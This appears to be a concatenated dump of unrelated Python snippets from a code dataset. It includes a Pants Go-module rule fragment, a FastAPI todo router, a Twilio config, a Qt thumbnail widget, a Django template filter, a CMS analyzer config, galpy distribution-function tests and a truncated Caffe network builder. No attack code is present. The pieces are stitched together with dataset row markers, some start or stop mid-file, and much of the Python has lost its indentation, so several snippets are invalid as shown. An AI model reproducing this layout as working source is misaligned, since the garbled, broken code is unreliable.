hydrated_sources = await Get(HydratedSources, HydrateSourcesRequest(sources_field))
sources_digest = hydrated_sources.snapshot.digest
mod_json = await Get(
ProcessResult,
GoSdkProcess(
command=("mod", "edit", "-json"),
input_digest=sources_digest,
working_dir=go_mod_dir,
description=f"Parse {go_mod_path}",
),
)
module_metadata = json.loads(mod_json.stdout)
return GoModInfo(
import_path=module_metadata["Module"]["Path"],
digest=sources_digest,
mod_path=go_mod_path,
minimum_go_version=module_metadata.get("Go"),
)
def rules():
return collect_rules()
| StarcoderdataPython |
50853 | from typing import List
from fastapi import APIRouter, Response
from .schemas import TodoItem, TodoPayload, UserPayload #,User
#----- Added by jtortolero -----
from sqlalchemy.orm import Session
from fastapi import Depends, HTTPException, status
from .models import Item, User
from .utils import password_hash
from .oauth2 import *
#-----------------------------
router = APIRouter()
@router.get("/items/", response_model=List[TodoItem])
def get_items(db:Session=Depends(get_db)):
"""Retrieve a persistent list of items."""
# TODO: Implement this
    items = db.query(Item).all()
return items
@router.get("/items/{id}", response_model=TodoItem)
def get_item(id: int, db:Session=Depends(get_db)):
"""Retrieve a particular item from the store."""
# TODO: Implement this.
item = db.query(Item).filter(Item.id==id).first()
if not item:
raise HTTPException(status_code = status.HTTP_404_NOT_FOUND,
                            detail=f'Item with id={id} does not exist')
return item
@router.post(
path="/items/",
response_model=TodoItem,
status_code=201,
response_description="The item has been created successfully.",
)
def create_item(payload: TodoPayload, db:Session=Depends(get_db), current_user:User=Depends(get_current_user)):
"""Add an item to the store."""
# TODO: Implement this.
# Requirements:
    # * Ensure a user is authenticated with basic credentials.
    # * Add the username to the item.
    new_item = Item(user_id=current_user.id, **payload.dict())
db.add(new_item)
db.commit()
db.refresh(new_item)
return new_item
@router.put("/items/{id}", response_model=TodoItem)
def update_item(id: int, payload: TodoPayload, db:Session=Depends(get_db),
current_user: User=Depends(get_current_user)):
# TODO: Implement this.
# * Ensure the user is authenticated. If not, either return a 401 response
# or raise an `HttpException` with a 401 code.
# * Ensure that the item is stored already in the datastore. If not, raise
# an `HttpException` with a 404 code or return a 404 response.
# * Check the username matches the item's username. If not, return a 403
# response or raise a `HttpException` with a 403 code.
# * Apply the update and save it to the database.
item_query = db.query(Item).filter(Item.id == id)
item_update = item_query.first()
    if item_update is None:
        raise HTTPException(status.HTTP_404_NOT_FOUND,
                            detail=f"Item {id} was not found")
    if item_update.user_id != current_user.id:
        raise HTTPException(status_code=status.HTTP_403_FORBIDDEN,
                            detail="You are not authorized to perform this action")
item_query.update(payload.dict(), synchronize_session=False)
db.commit()
return item_query.first()
@router.delete("/items/{id}", response_class=Response, status_code=204)
def remove_item(id: int, db:Session=Depends(get_db), current_user: User = Depends(get_current_user)):
# TODO: Implement this
# 1. Check that the item exists in the datastore.
# 2. Ensure the user is authenticated.
# 3. Check if the currently logged username matches.
# 4. Remove the item from the store.
item_query = db.query(Item).filter(Item.id == id)
item = item_query.first()
    if item is None:
        raise HTTPException(status.HTTP_404_NOT_FOUND,
                            detail=f"Item {id} was not found")
    if item.user_id != current_user.id:
        raise HTTPException(status_code=status.HTTP_403_FORBIDDEN,
                            detail="You are not authorized to perform this action")
item_query.delete(synchronize_session=False)
db.commit()
return Response(status_code=status.HTTP_204_NO_CONTENT)
@router.post("/users/")
def create_user(payload: UserPayload, db:Session=Depends(get_db)):
# TODO: Implement this.
# 1. Validate the username has no uppercase letter, @ sign, nor
# punctuations.
# 2. Hash the password and store the user in the data store.
user = User(
name = payload.name,
username = payload.username,
email = payload.email,
password = password_hash(payload.password)
)
db.add(user)
db.commit()
db.refresh(user)
return user
@router.get("/users/me")
def read_current_user(current_user: User = Depends(get_current_user)):
    """Return the currently authenticated user."""
    return current_user
| StarcoderdataPython |
1784650 | <filename>services/sms/config.py
import os
class BaseConfig:
"""Base configuration"""
DEBUG = False
TESTING = False
TWILIO_ACCOUNT_SID=os.environ['TWILIO_ACCOUNT_SID']
TWILIO_AUTH_TOKEN=os.environ['TWILIO_AUTH_TOKEN']
| StarcoderdataPython |
1751040 | <reponame>JoanAzpeitia/lp_sg
# Copyright (c) 2013 Shotgun Software Inc.
#
# CONFIDENTIAL AND PROPRIETARY
#
# This work is provided "AS IS" and subject to the Shotgun Pipeline Toolkit
# Source Code License included in this distribution package. See LICENSE.
# By accessing, using, copying or modifying this work you indicate your
# agreement to the Shotgun Pipeline Toolkit Source Code License. All rights
# not expressly granted therein are reserved by Shotgun Software Inc.
import os
import sys
from tank.platform.qt import QtCore, QtGui
class ThumbnailLabel(QtGui.QLabel):
def __init__(self, parent=None):
QtGui.QLabel.__init__(self, parent)
def setPixmap(self, pixmap):
# scale the pixmap down to fit
if pixmap.height() > 40 or pixmap.width() > 60:
            # scale it down to 60x40
            pixmap = pixmap.scaled( QtCore.QSize(60,40), QtCore.Qt.KeepAspectRatio, QtCore.Qt.SmoothTransformation)
        # now place it on top of a 60x40 transparent canvas
rendered_pixmap = QtGui.QPixmap(60, 40)
rendered_pixmap.fill(QtCore.Qt.transparent)
w_offset = (60 - pixmap.width()) / 2
h_offset = (40 - pixmap.height()) / 2
painter = QtGui.QPainter(rendered_pixmap)
painter.drawPixmap(w_offset, h_offset, pixmap)
painter.end()
# and finally assign it
QtGui.QLabel.setPixmap(self, rendered_pixmap)
| StarcoderdataPython |
4806383 | from django import template
from django.db.utils import OperationalError
from django.contrib.auth import get_user_model
from django.contrib.auth.models import Group
register = template.Library()
@register.filter(name='has_group')
def has_group(user, group_name):
"""
    Check whether a user belongs to a given group, for use inside templates.
    :param User user: User to be checked.
:param str group_name: Name of the group to ask for.
:return: True or False
:rtype: bool
"""
return user.groups.filter(name=group_name).exists()
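# Example template usage (hypothetical app/file names), assuming this module is saved as
# `templatetags/group_filters.py` inside an installed app:
#   {% load group_filters %}
#   {% if request.user|has_group:"editors" %} ... {% endif %}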
| StarcoderdataPython |
1624263 | <filename>Calibration/HcalCalibAlgos/python/gammaJetAnalysis_cfi.py
import FWCore.ParameterSet.Config as cms
from RecoJets.Configuration.RecoJets_cff import *
from RecoJets.Configuration.RecoPFJets_cff import *
from CommonTools.ParticleFlow.pfNoPileUp_cff import *
GammaJetAnalysis = cms.EDAnalyzer('GammaJetAnalysis',
rhoColl = cms.InputTag("fixedGridRhoFastjetAll"),
PFMETColl = cms.InputTag("pfMet"),
PFMETTYPE1Coll = cms.InputTag("pfType1CorrectedMet"),
photonCollName = cms.string('gedPhotons'),
pfJetCollName = cms.string('ak4PFJetsCHS'),
pfJetCorrName = cms.string('ak4PFCHSL2L3'),
genJetCollName = cms.string('ak4GenJets'),
genParticleCollName = cms.string('genParticles'),
genEventInfoName = cms.string('generator'),
hbheRecHitName = cms.string('hbhereco'),
hfRecHitName = cms.string('hfreco'),
hoRecHitName = cms.string('horeco'),
rootHistFilename = cms.string('PhotonPlusJet_tree.root'),
pvCollName = cms.string('offlinePrimaryVertices'),
beamSpotName= cms.string('offlineBeamSpot'),
conversionsName= cms.string('allConversions'),
electronCollName= cms.string('gedGsfElectrons'),
photonIdTightName= cms.InputTag('PhotonIDProdGED','PhotonCutBasedIDTight'),
photonIdLooseName= cms.InputTag('PhotonIDProdGED','PhotonCutBasedIDLoose'),
prodProcess = cms.untracked.string('reRECO'),
allowNoPhoton = cms.bool(False),
photonJetDPhiMin = cms.double(2.0), # 0.75 pi= 2.356, 0.7 pi=2.2
photonPtMin = cms.double(15.),
jetEtMin = cms.double(15.),
jet2EtMax = cms.double(100.),
jet3EtMax = cms.double(50.),
photonTriggers = cms.vstring(''), #HLT_Photon20_*, HLT_Photon135*'),
jetTriggers = cms.vstring(''), #HLT_Jet30*'),
writeTriggerPrescale= cms.bool(False),
doPFJets = cms.bool(True),
doGenJets = cms.bool(True),
debug = cms.untracked.int32(0),
debugHLTTrigNames = cms.untracked.int32(2),
workOnAOD = cms.int32(0)
)
| StarcoderdataPython |
1750623 | # Tests of the quasiisothermaldf module
from __future__ import print_function, division
import numpy
#fiducial setup uses these
from galpy.potential import MWPotential, vcirc, omegac, epifreq, verticalfreq
from galpy.actionAngle import actionAngleAdiabatic, actionAngleStaeckel
from galpy.df import quasiisothermaldf
aAA= actionAngleAdiabatic(pot=MWPotential,c=True)
aAS= actionAngleStaeckel(pot=MWPotential,c=True,delta=0.5)
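# Each test below tabulates a joint velocity pdf (pvRvT, pvTvz, or pvRvz) on a grid and
# checks its first and second moments against the df's direct meanvT/sigmaR2/sigmaT2/sigmaz2.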
def test_pvRvT_adiabatic():
qdf= quasiisothermaldf(1./4.,0.2,0.1,1.,1.,
pot=MWPotential,aA=aAA,cutcounter=True)
R,z= 0.8, 0.1
vRs= numpy.linspace(-1.,1.,21)
vTs= numpy.linspace(0.,1.5,51)
pvRvT= numpy.array([[qdf.pvRvT(vr,vt,R,z) for vt in vTs] for vr in vRs])
tvR= numpy.tile(vRs,(len(vTs),1)).T
tvT= numpy.tile(vTs,(len(vRs),1))
mvR= numpy.sum(tvR*pvRvT)/numpy.sum(pvRvT)
mvT= numpy.sum(tvT*pvRvT)/numpy.sum(pvRvT)
svR= numpy.sqrt(numpy.sum(tvR**2.*pvRvT)/numpy.sum(pvRvT)-mvR**2.)
svT= numpy.sqrt(numpy.sum(tvT**2.*pvRvT)/numpy.sum(pvRvT)-mvT**2.)
svRvT= (numpy.sum(tvR*tvT*pvRvT)/numpy.sum(pvRvT)-mvR*mvT)/svR/svT
assert numpy.fabs(mvR) < 0.01, 'mean vR calculated from pvRvT not equal to zero for adiabatic actions'
assert numpy.fabs(mvT-qdf.meanvT(R,z)) < 0.01, 'mean vT calculated from pvRvT not equal to zero for adiabatic actions'
assert numpy.fabs(numpy.log(svR)-0.5*numpy.log(qdf.sigmaR2(R,z))) < 0.01, 'sigma vR calculated from pvRvT not equal to that from sigmaR2 for adiabatic actions'
assert numpy.fabs(numpy.log(svT)-0.5*numpy.log(qdf.sigmaT2(R,z))) < 0.01, 'sigma vT calculated from pvRvT not equal to that from sigmaT2 for adiabatic actions'
assert numpy.fabs(svRvT) < 0.01, 'correlation between vR and vT calculated from pvRvT not equal to zero for adiabatic actions'
return None
def test_pvRvT_staeckel():
qdf= quasiisothermaldf(1./4.,0.2,0.1,1.,1.,
pot=MWPotential,aA=aAS,cutcounter=True)
R,z= 0.8, 0.1
vRs= numpy.linspace(-1.,1.,21)
vTs= numpy.linspace(0.,1.5,51)
pvRvT= numpy.array([[qdf.pvRvT(vr,vt,R,z) for vt in vTs] for vr in vRs])
tvR= numpy.tile(vRs,(len(vTs),1)).T
tvT= numpy.tile(vTs,(len(vRs),1))
mvR= numpy.sum(tvR*pvRvT)/numpy.sum(pvRvT)
mvT= numpy.sum(tvT*pvRvT)/numpy.sum(pvRvT)
svR= numpy.sqrt(numpy.sum(tvR**2.*pvRvT)/numpy.sum(pvRvT)-mvR**2.)
svT= numpy.sqrt(numpy.sum(tvT**2.*pvRvT)/numpy.sum(pvRvT)-mvT**2.)
svRvT= (numpy.sum(tvR*tvT*pvRvT)/numpy.sum(pvRvT)-mvR*mvT)/svR/svT
assert numpy.fabs(mvR) < 0.01, 'mean vR calculated from pvRvT not equal to zero for staeckel actions'
assert numpy.fabs(mvT-qdf.meanvT(R,z)) < 0.01, 'mean vT calculated from pvRvT not equal to zero for staeckel actions'
assert numpy.fabs(numpy.log(svR)-0.5*numpy.log(qdf.sigmaR2(R,z))) < 0.01, 'sigma vR calculated from pvRvT not equal to that from sigmaR2 for staeckel actions'
assert numpy.fabs(numpy.log(svT)-0.5*numpy.log(qdf.sigmaT2(R,z))) < 0.01, 'sigma vT calculated from pvRvT not equal to that from sigmaT2 for staeckel actions'
assert numpy.fabs(svRvT) < 0.01, 'correlation between vR and vT calculated from pvRvT not equal to zero for staeckel actions'
return None
def test_pvRvT_staeckel_diffngl():
qdf= quasiisothermaldf(1./4.,0.2,0.1,1.,1.,
pot=MWPotential,aA=aAS,cutcounter=True)
R,z= 0.8, 0.1
vRs= numpy.linspace(-1.,1.,21)
vTs= numpy.linspace(0.,1.5,51)
#ngl=10
pvRvT= numpy.array([[qdf.pvRvT(vr,vt,R,z,ngl=10) for vt in vTs] for vr in vRs])
tvR= numpy.tile(vRs,(len(vTs),1)).T
tvT= numpy.tile(vTs,(len(vRs),1))
mvR= numpy.sum(tvR*pvRvT)/numpy.sum(pvRvT)
mvT= numpy.sum(tvT*pvRvT)/numpy.sum(pvRvT)
svR= numpy.sqrt(numpy.sum(tvR**2.*pvRvT)/numpy.sum(pvRvT)-mvR**2.)
svT= numpy.sqrt(numpy.sum(tvT**2.*pvRvT)/numpy.sum(pvRvT)-mvT**2.)
svRvT= (numpy.sum(tvR*tvT*pvRvT)/numpy.sum(pvRvT)-mvR*mvT)/svR/svT
assert numpy.fabs(mvR) < 0.01, 'mean vR calculated from pvRvT not equal to zero for staeckel actions'
assert numpy.fabs(mvT-qdf.meanvT(R,z)) < 0.01, 'mean vT calculated from pvRvT not equal to zero for staeckel actions'
assert numpy.fabs(numpy.log(svR)-0.5*numpy.log(qdf.sigmaR2(R,z))) < 0.01, 'sigma vR calculated from pvRvT not equal to that from sigmaR2 for staeckel actions'
assert numpy.fabs(numpy.log(svT)-0.5*numpy.log(qdf.sigmaT2(R,z))) < 0.01, 'sigma vT calculated from pvRvT not equal to that from sigmaT2 for staeckel actions'
assert numpy.fabs(svRvT) < 0.01, 'correlation between vR and vT calculated from pvRvT not equal to zero for staeckel actions'
    #ngl=40
pvRvT= numpy.array([[qdf.pvRvT(vr,vt,R,z,ngl=40) for vt in vTs] for vr in vRs])
mvR= numpy.sum(tvR*pvRvT)/numpy.sum(pvRvT)
mvT= numpy.sum(tvT*pvRvT)/numpy.sum(pvRvT)
svR= numpy.sqrt(numpy.sum(tvR**2.*pvRvT)/numpy.sum(pvRvT)-mvR**2.)
svT= numpy.sqrt(numpy.sum(tvT**2.*pvRvT)/numpy.sum(pvRvT)-mvT**2.)
svRvT= (numpy.sum(tvR*tvT*pvRvT)/numpy.sum(pvRvT)-mvR*mvT)/svR/svT
assert numpy.fabs(mvR) < 0.01, 'mean vR calculated from pvRvT not equal to zero for staeckel actions'
assert numpy.fabs(mvT-qdf.meanvT(R,z)) < 0.01, 'mean vT calculated from pvRvT not equal to zero for staeckel actions'
assert numpy.fabs(numpy.log(svR)-0.5*numpy.log(qdf.sigmaR2(R,z))) < 0.01, 'sigma vR calculated from pvRvT not equal to that from sigmaR2 for staeckel actions'
assert numpy.fabs(numpy.log(svT)-0.5*numpy.log(qdf.sigmaT2(R,z))) < 0.01, 'sigma vT calculated from pvRvT not equal to that from sigmaT2 for staeckel actions'
assert numpy.fabs(svRvT) < 0.01, 'correlation between vR and vT calculated from pvRvT not equal to zero for staeckel actions'
#ngl=11, shouldn't work
try:
pvRvT= numpy.array([[qdf.pvRvT(vr,vt,R,z,ngl=11) for vt in vTs] for vr in vRs])
except ValueError: pass
else: raise AssertionError('pvz w/ ngl=odd did not raise ValueError')
return None
def test_pvTvz_adiabatic():
qdf= quasiisothermaldf(1./4.,0.2,0.1,1.,1.,
pot=MWPotential,aA=aAA,cutcounter=True)
R,z= 0.8, 0.1
vTs= numpy.linspace(0.,1.5,51)
vzs= numpy.linspace(-1.,1.,21)
pvTvz= numpy.array([[qdf.pvTvz(vt,vz,R,z) for vt in vTs] for vz in vzs])
tvT= numpy.tile(vTs,(len(vzs),1))
tvz= numpy.tile(vzs,(len(vTs),1)).T
mvz= numpy.sum(tvz*pvTvz)/numpy.sum(pvTvz)
mvT= numpy.sum(tvT*pvTvz)/numpy.sum(pvTvz)
svz= numpy.sqrt(numpy.sum(tvz**2.*pvTvz)/numpy.sum(pvTvz)-mvz**2.)
svT= numpy.sqrt(numpy.sum(tvT**2.*pvTvz)/numpy.sum(pvTvz)-mvT**2.)
svTvz= (numpy.sum(tvz*tvT*pvTvz)/numpy.sum(pvTvz)-mvz*mvT)/svz/svT
assert numpy.fabs(mvz) < 0.01, 'mean vz calculated from pvTvz not equal to zero for adiabatic actions'
assert numpy.fabs(mvT-qdf.meanvT(R,z)) < 0.01, 'mean vT calculated from pvTvz not equal to zero for adiabatic actions'
assert numpy.fabs(numpy.log(svz)-0.5*numpy.log(qdf.sigmaz2(R,z))) < 0.01, 'sigma vz calculated from pvTvz not equal to that from sigmaz2 for adiabatic actions'
assert numpy.fabs(numpy.log(svT)-0.5*numpy.log(qdf.sigmaT2(R,z))) < 0.01, 'sigma vT calculated from pvTvz not equal to that from sigmaT2 for adiabatic actions'
assert numpy.fabs(svTvz) < 0.01, 'correlation between vz and vT calculated from pvTvz not equal to zero for adiabatic actions'
return None
def test_pvTvz_staeckel():
qdf= quasiisothermaldf(1./4.,0.2,0.1,1.,1.,
pot=MWPotential,aA=aAS,cutcounter=True)
R,z= 0.8, 0.1
vzs= numpy.linspace(-1.,1.,21)
vTs= numpy.linspace(0.,1.5,51)
pvTvz= numpy.array([[qdf.pvTvz(vt,vz,R,z) for vt in vTs] for vz in vzs])
tvz= numpy.tile(vzs,(len(vTs),1)).T
tvT= numpy.tile(vTs,(len(vzs),1))
mvz= numpy.sum(tvz*pvTvz)/numpy.sum(pvTvz)
mvT= numpy.sum(tvT*pvTvz)/numpy.sum(pvTvz)
svz= numpy.sqrt(numpy.sum(tvz**2.*pvTvz)/numpy.sum(pvTvz)-mvz**2.)
svT= numpy.sqrt(numpy.sum(tvT**2.*pvTvz)/numpy.sum(pvTvz)-mvT**2.)
svTvz= (numpy.sum(tvz*tvT*pvTvz)/numpy.sum(pvTvz)-mvz*mvT)/svz/svT
assert numpy.fabs(mvz) < 0.01, 'mean vz calculated from pvTvz not equal to zero for staeckel actions'
assert numpy.fabs(mvT-qdf.meanvT(R,z)) < 0.01, 'mean vT calculated from pvTvz not equal to zero for staeckel actions'
assert numpy.fabs(numpy.log(svz)-0.5*numpy.log(qdf.sigmaz2(R,z))) < 0.01, 'sigma vz calculated from pvTvz not equal to that from sigmaz2 for staeckel actions'
assert numpy.fabs(numpy.log(svT)-0.5*numpy.log(qdf.sigmaT2(R,z))) < 0.01, 'sigma vT calculated from pvTvz not equal to that from sigmaT2 for staeckel actions'
assert numpy.fabs(svTvz) < 0.01, 'correlation between vz and vT calculated from pvTvz not equal to zero for staeckel actions'
return None
def test_pvTvz_staeckel_diffngl():
qdf= quasiisothermaldf(1./4.,0.2,0.1,1.,1.,
pot=MWPotential,aA=aAS,cutcounter=True)
R,z= 0.8, 0.1
vzs= numpy.linspace(-1.,1.,21)
vTs= numpy.linspace(0.,1.5,51)
#ngl=10
pvTvz= numpy.array([[qdf.pvTvz(vt,vz,R,z,ngl=10) for vt in vTs] for vz in vzs])
tvz= numpy.tile(vzs,(len(vTs),1)).T
tvT= numpy.tile(vTs,(len(vzs),1))
mvz= numpy.sum(tvz*pvTvz)/numpy.sum(pvTvz)
mvT= numpy.sum(tvT*pvTvz)/numpy.sum(pvTvz)
svz= numpy.sqrt(numpy.sum(tvz**2.*pvTvz)/numpy.sum(pvTvz)-mvz**2.)
svT= numpy.sqrt(numpy.sum(tvT**2.*pvTvz)/numpy.sum(pvTvz)-mvT**2.)
svTvz= (numpy.sum(tvz*tvT*pvTvz)/numpy.sum(pvTvz)-mvz*mvT)/svz/svT
assert numpy.fabs(mvz) < 0.01, 'mean vz calculated from pvTvz not equal to zero for staeckel actions'
assert numpy.fabs(mvT-qdf.meanvT(R,z)) < 0.01, 'mean vT calculated from pvTvz not equal to zero for staeckel actions'
assert numpy.fabs(numpy.log(svz)-0.5*numpy.log(qdf.sigmaz2(R,z))) < 0.01, 'sigma vz calculated from pvTvz not equal to that from sigmaz2 for staeckel actions'
assert numpy.fabs(numpy.log(svT)-0.5*numpy.log(qdf.sigmaT2(R,z))) < 0.01, 'sigma vT calculated from pvTvz not equal to that from sigmaT2 for staeckel actions'
assert numpy.fabs(svTvz) < 0.01, 'correlation between vz and vT calculated from pvTvz not equal to zero for staeckel actions'
    #ngl=40
pvTvz= numpy.array([[qdf.pvTvz(vt,vz,R,z,ngl=40) for vt in vTs] for vz in vzs])
mvz= numpy.sum(tvz*pvTvz)/numpy.sum(pvTvz)
mvT= numpy.sum(tvT*pvTvz)/numpy.sum(pvTvz)
svz= numpy.sqrt(numpy.sum(tvz**2.*pvTvz)/numpy.sum(pvTvz)-mvz**2.)
svT= numpy.sqrt(numpy.sum(tvT**2.*pvTvz)/numpy.sum(pvTvz)-mvT**2.)
svTvz= (numpy.sum(tvz*tvT*pvTvz)/numpy.sum(pvTvz)-mvz*mvT)/svz/svT
assert numpy.fabs(mvz) < 0.01, 'mean vz calculated from pvTvz not equal to zero for staeckel actions'
assert numpy.fabs(mvT-qdf.meanvT(R,z)) < 0.01, 'mean vT calculated from pvTvz not equal to zero for staeckel actions'
assert numpy.fabs(numpy.log(svz)-0.5*numpy.log(qdf.sigmaz2(R,z))) < 0.01, 'sigma vz calculated from pvTvz not equal to that from sigmaz2 for staeckel actions'
assert numpy.fabs(numpy.log(svT)-0.5*numpy.log(qdf.sigmaT2(R,z))) < 0.01, 'sigma vT calculated from pvTvz not equal to that from sigmaT2 for staeckel actions'
assert numpy.fabs(svTvz) < 0.01, 'correlation between vz and vT calculated from pvTvz not equal to zero for staeckel actions'
#ngl=11, shouldn't work
try:
pvTvz= numpy.array([[qdf.pvTvz(vt,vz,R,z,ngl=11) for vt in vTs] for vz in vzs])
except ValueError: pass
else: raise AssertionError('pvz w/ ngl=odd did not raise ValueError')
return None
def test_pvRvz_adiabatic():
qdf= quasiisothermaldf(1./4.,0.2,0.1,1.,1.,
pot=MWPotential,aA=aAA,cutcounter=True)
R,z= 0.8, 0.1
vRs= numpy.linspace(-1.,1.,21)
vzs= numpy.linspace(-1.,1.,21)
pvRvz= numpy.array([[qdf.pvRvz(vr,vz,R,z) for vz in vzs] for vr in vRs])
tvR= numpy.tile(vRs,(len(vzs),1)).T
tvz= numpy.tile(vzs,(len(vRs),1))
mvR= numpy.sum(tvR*pvRvz)/numpy.sum(pvRvz)
mvz= numpy.sum(tvz*pvRvz)/numpy.sum(pvRvz)
svR= numpy.sqrt(numpy.sum(tvR**2.*pvRvz)/numpy.sum(pvRvz)-mvR**2.)
svz= numpy.sqrt(numpy.sum(tvz**2.*pvRvz)/numpy.sum(pvRvz)-mvz**2.)
svRvz= (numpy.sum(tvR*tvz*pvRvz)/numpy.sum(pvRvz)-mvR*mvz)/svR/svz
sR2= qdf.sigmaR2(R,z) #direct calculation
sz2= qdf.sigmaz2(R,z)
assert numpy.fabs(mvR) < 0.01, 'mean vR calculated from pvRvz not equal to zero for adiabatic actions'
assert numpy.fabs(mvz) < 0.01, 'mean vz calculated from pvRvz not equal to zero for adiabatic actions'
assert numpy.fabs(numpy.log(svR)-0.5*numpy.log(sR2)) < 0.01, 'sigma vR calculated from pvRvz not equal to that from sigmaR2 for adiabatic actions'
assert numpy.fabs(numpy.log(svz)-0.5*numpy.log(sz2)) < 0.01, 'sigma vz calculated from pvRvz not equal to that from sigmaz2 for adiabatic actions'
assert numpy.fabs(svRvz-qdf.sigmaRz(R,z)/numpy.sqrt(sR2*sz2)) < 0.01, 'correlation between vR and vz calculated from pvRvz not equal to zero for adiabatic actions'
return None
def test_pvRvz_staeckel():
qdf= quasiisothermaldf(1./4.,0.2,0.1,1.,1.,
pot=MWPotential,aA=aAS,cutcounter=True)
R,z= 0.8, 0.1
vRs= numpy.linspace(-1.,1.,21)
vzs= numpy.linspace(-1.,1.,21)
pvRvz= numpy.array([[qdf.pvRvz(vr,vz,R,z) for vz in vzs] for vr in vRs])
tvR= numpy.tile(vRs,(len(vzs),1)).T
tvz= numpy.tile(vzs,(len(vRs),1))
mvR= numpy.sum(tvR*pvRvz)/numpy.sum(pvRvz)
mvz= numpy.sum(tvz*pvRvz)/numpy.sum(pvRvz)
svR= numpy.sqrt(numpy.sum(tvR**2.*pvRvz)/numpy.sum(pvRvz)-mvR**2.)
svz= numpy.sqrt(numpy.sum(tvz**2.*pvRvz)/numpy.sum(pvRvz)-mvz**2.)
svRvz= (numpy.sum(tvR*tvz*pvRvz)/numpy.sum(pvRvz)-mvR*mvz)/svR/svz
sR2= qdf.sigmaR2(R,z) #direct calculation
sz2= qdf.sigmaz2(R,z)
assert numpy.fabs(mvR) < 0.01, 'mean vR calculated from pvRvz not equal to zero for staeckel actions'
assert numpy.fabs(mvz) < 0.01, 'mean vz calculated from pvRvz not equal to zero for staeckel actions'
assert numpy.fabs(numpy.log(svR)-0.5*numpy.log(sR2)) < 0.01, 'sigma vR calculated from pvRvz not equal to that from sigmaR2 for staeckel actions'
assert numpy.fabs(numpy.log(svz)-0.5*numpy.log(sz2)) < 0.01, 'sigma vz calculated from pvRvz not equal to that from sigmaz2 for staeckel actions'
assert numpy.fabs(svRvz-qdf.sigmaRz(R,z)/numpy.sqrt(sR2*sz2)) < 0.01, 'correlation between vR and vz calculated from pvRvz not equal to zero for adiabatic actions'
return None
def test_pvRvz_staeckel_diffngl():
qdf= quasiisothermaldf(1./4.,0.2,0.1,1.,1.,
pot=MWPotential,aA=aAS,cutcounter=True)
R,z= 0.8, 0.1
vRs= numpy.linspace(-1.,1.,21)
vzs= numpy.linspace(-1.,1.,21)
#ngl=10
pvRvz= numpy.array([[qdf.pvRvz(vr,vz,R,z,ngl=10) for vz in vzs] for vr in vRs])
tvR= numpy.tile(vRs,(len(vzs),1)).T
tvz= numpy.tile(vzs,(len(vRs),1))
mvR= numpy.sum(tvR*pvRvz)/numpy.sum(pvRvz)
mvz= numpy.sum(tvz*pvRvz)/numpy.sum(pvRvz)
svR= numpy.sqrt(numpy.sum(tvR**2.*pvRvz)/numpy.sum(pvRvz)-mvR**2.)
svz= numpy.sqrt(numpy.sum(tvz**2.*pvRvz)/numpy.sum(pvRvz)-mvz**2.)
svRvz= (numpy.sum(tvR*tvz*pvRvz)/numpy.sum(pvRvz)-mvR*mvz)/svR/svz
sR2= qdf.sigmaR2(R,z) #direct calculation
sz2= qdf.sigmaz2(R,z)
assert numpy.fabs(mvR) < 0.01, 'mean vR calculated from pvRvz not equal to zero for staeckel actions'
assert numpy.fabs(mvz) < 0.01, 'mean vz calculated from pvRvz not equal to zero for staeckel actions'
assert numpy.fabs(numpy.log(svR)-0.5*numpy.log(sR2)) < 0.01, 'sigma vR calculated from pvRvz not equal to that from sigmaR2 for staeckel actions'
assert numpy.fabs(numpy.log(svz)-0.5*numpy.log(sz2)) < 0.01, 'sigma vz calculated from pvRvz not equal to that from sigmaz2 for staeckel actions'
assert numpy.fabs(svRvz-qdf.sigmaRz(R,z)/numpy.sqrt(sR2*sz2)) < 0.01, 'correlation between vR and vz calculated from pvRvz not equal to zero for adiabatic actions'
    #ngl=40
pvRvz= numpy.array([[qdf.pvRvz(vr,vz,R,z,ngl=40) for vz in vzs] for vr in vRs])
mvR= numpy.sum(tvR*pvRvz)/numpy.sum(pvRvz)
mvz= numpy.sum(tvz*pvRvz)/numpy.sum(pvRvz)
svR= numpy.sqrt(numpy.sum(tvR**2.*pvRvz)/numpy.sum(pvRvz)-mvR**2.)
svz= numpy.sqrt(numpy.sum(tvz**2.*pvRvz)/numpy.sum(pvRvz)-mvz**2.)
svRvz= (numpy.sum(tvR*tvz*pvRvz)/numpy.sum(pvRvz)-mvR*mvz)/svR/svz
assert numpy.fabs(mvR) < 0.01, 'mean vR calculated from pvRvz not equal to zero for staeckel actions'
assert numpy.fabs(mvz) < 0.01, 'mean vz calculated from pvRvz not equal to zero for staeckel actions'
assert numpy.fabs(numpy.log(svR)-0.5*numpy.log(sR2)) < 0.01, 'sigma vR calculated from pvRvz not equal to that from sigmaR2 for staeckel actions'
assert numpy.fabs(numpy.log(svz)-0.5*numpy.log(sz2)) < 0.01, 'sigma vz calculated from pvRvz not equal to that from sigmaz2 for staeckel actions'
assert numpy.fabs(svRvz-qdf.sigmaRz(R,z)/numpy.sqrt(sR2*sz2)) < 0.01, 'correlation between vR and vz calculated from pvRvz not equal to zero for adiabatic actions'
#ngl=11, shouldn't work
try:
pvRvz= numpy.array([[qdf.pvRvz(vr,vz,R,z,ngl=11) for vz in vzs] for vr in vRs])
except ValueError: pass
else: raise AssertionError('pvz w/ ngl=odd did not raise ValueError')
return None
def test_pvRvz_staeckel_arrayin():
qdf= quasiisothermaldf(1./4.,0.2,0.1,1.,1.,
pot=MWPotential,aA=aAS,cutcounter=True)
R,z= 0.8, 0.1
pvRvz= qdf.pvRvz(0.1*numpy.ones(2),0.05*numpy.ones(2),R*numpy.ones(2),z*numpy.ones(2))
assert numpy.all(numpy.fabs(numpy.log(pvRvz)-numpy.log(qdf.pvRvz(0.1,0.05,R,z))) < 10.**-10.), 'pvRvz calculated with R and z array input does not equal to calculated with scalar input'
return None
| StarcoderdataPython |
3251938 | import _init_paths
import os
import os.path as osp
import caffe
from caffe import layers as L, params as P
from caffe import tools
from caffe.model_libs import *
def caffenet_body(net, data, post, is_train):
# the net itself
net['conv1'+post], net['relu1'+post] = conv_relu(net[data], 11, 96, stride=4, is_train=is_train)
net['pool1'+post] = max_pool(net['relu1'+post], 3, stride=2)
net['norm1'+post] = L.LRN(net['pool1'+post], local_size=5, alpha=1e-4, beta=0.75, engine=P.LRN.CAFFE)
net['conv2'+post], net['relu2'+post] = conv_relu(net['norm1'+post], 5, 256, pad=2, group=2, is_train=is_train)
net['pool2'+post] = max_pool(net['relu2'+post], 3, stride=2)
net['norm2'+post] = L.LRN(net['pool2'+post], local_size=5, alpha=1e-4, beta=0.75, engine=P.LRN.CAFFE)
net['conv3'+post], net['relu3'+post] = conv_relu(net['norm2'+post], 3, 384, pad=1, is_train=is_train)
net['conv4'+post], net['relu4'+post] = conv_relu(net['relu3'+post], 3, 384, pad=1, group=2, is_train=is_train)
